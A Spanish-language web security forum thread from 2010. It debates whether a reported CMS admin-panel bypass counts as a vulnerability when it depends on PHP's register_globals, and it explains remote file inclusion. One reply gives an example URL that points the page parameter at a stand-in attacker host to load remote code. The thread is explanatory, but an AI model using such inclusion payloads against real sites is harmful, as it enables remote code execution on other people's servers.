|
Título: Duda ¿se considera vulnerable? Publicado por: bizco en 3 Junio 2010, 13:19 pm Hola, ojeando el codigo de un CMS comercial vi que puedo ver el panel de administracion y supongo que con las pruebas satisfactorias hasta el momento me puedo crear un usuario en el grupo admin y luego logearme tranquilamente (esto de momento no lo he probado, solo el listar usuarios). no necesito ser usuario logeado previamente para lograr ver el panel de administracion, el unico problema es que register_globals necesita estar en on... ¿se puede considerar entonces vulnerable? ya que estando en off, no lo es (o eso creo yo).
Título: Re: Duda ¿se considera vulnerable? Publicado por: Shell Root en 3 Junio 2010, 20:01 pm Lo haz hecho o no? Solo son hipótesis?
Título: Re: Duda ¿se considera vulnerable? Publicado por: bizco en 3 Junio 2010, 20:15 pm si si, claro que esta hecho. ya esta reportado y lo estan arreglando :).
la duda era si al tener que estar register_globals en on se podria considerar vulnrable. Título: Re: Duda ¿se considera vulnerable? Publicado por: Shell Root en 3 Junio 2010, 20:27 pm Cuando las register_globals estan activadas en php.ini, puede permitir que un usuario inicialice varias variables no inicializadas anteriormente de manera remota.
Muchas veces esto es utilizado para que un usuario malévolo pueda incluir ficheros no deseados y le permite ejecutar código arbitrario desde una localización remota. Por ejemplo: Código
Aquí si el parámetro $page no se inicializa y si las register_globals están activados, el servidor será vulnerable a la ejecución remota de código incluyendo cualquier archivo arbitrario en el parámetro $page. Este sería un ejemplo: Código: "www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt" Más información: :http://www.desarrolloweb.com/articulos/principales-vulnerabilidades-web.html Título: Re: Duda ¿se considera vulnerable? Publicado por: bizco en 3 Junio 2010, 21:00 pm si, si lo tengo claro. lo que quiero decir es si se considera vulnerable ya que no todos los servidores tienen register_globals en on, simplemente eso :).
Título: Re: Duda ¿se considera vulnerable? Publicado por: Shell Root en 3 Junio 2010, 21:03 pm Leiste bien?
Aquí si el parámetro $page no se inicializa y si las register_globals están activados, el servidor será vulnerable a la ejecución remota de código incluyendo cualquier archivo arbitrario en el parámetro $page. Título: Re: Duda ¿se considera vulnerable? Publicado por: bizco en 3 Junio 2010, 21:21 pm me leiste bien tu al principio?
Citar el unico problema es que register_globals necesita estar en on... ¿se puede considerar entonces vulnerable? en ningun momento pregunte que hace register_globals. sabia que poniendolo en on, podia saltarme el formulario de login, pero no sabia si se considera vulnerable al depender de register_globals. Título: Re: Duda ¿se considera vulnerable? Publicado por: tragantras en 3 Junio 2010, 21:42 pm jaja vaya discusión...
yo pienso que como vulnerabilidad se podría considerar... pero dudo mucho que algun servidor comercial tenga el registr_globals a on :/ ya que no es opcion por defecto y no se me ocurre ningun beneficio de ello (aparte de ahorrarse los $_GET y esas cosas xD ) Título: Re: Duda ¿se considera vulnerable? Publicado por: bizco en 3 Junio 2010, 22:14 pm por eso mismo tenia mis dudas, pero vamos que hay mas server de los que parecen con esta opcion activada.
|